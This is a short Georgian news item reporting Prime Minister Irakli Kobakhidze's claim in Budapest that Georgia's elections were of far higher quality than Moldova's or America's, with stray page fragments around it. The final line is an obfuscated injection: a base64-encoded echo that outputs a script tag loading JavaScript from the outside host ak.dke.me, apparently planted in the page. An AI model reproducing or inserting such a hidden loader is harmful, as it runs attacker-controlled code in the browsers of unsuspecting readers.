celsiusi
ავერსი შნაიდერი

ამერიკის შეერთებულ შტატებში, აბსოლუტურად პირდაპირ, ცხადად ჩანდა, თუ ვინ ვის აძლევდა ხმას საარჩევნო უბნების უმრავლესობაში , - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი კობახიძემ ბუდაპეშტში, ჟურნალისტებთან საუბარში განაცხადა.

კობახიძის შეფასებით, საქართველოში არჩევნები უმაღლესი ხარისხით ჩატარდა.

“ამერიკის შეერთებულ შტატებში, აბსოლუტურად პირდაპირ, ცხადად ჩანდა, თუ ვინ ვის აძლევდა ხმას საარჩევნო უბნების უმრავლესობაში. საქართველოში არჩევნები ჩატარდა უმაღლესი ხარისხით. რა თქმა უნდა, იყო გარკვეული ხარვეზები, მაგრამ ასეთი ხარვეზები ნებისმიერ ქვეყანას ახასიათებს, როცა სამი ათასი უბანი იხსნება, მაგრამ, თქვენ რომ შეადაროთ საქართველოსა და მოლდოვას არჩევნები, საქართველოსა და აშშ-ის არჩევნები, ცა და დედამიწაა ხარისხის კუთხით - ქართული არჩევნები იყო ბევრად უფრო ხარისხიანი, ვიდრე მოლდოვური და ამერიკული არჩევნები”, - განაცხადა ირაკლი კობახიძემ.

64
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");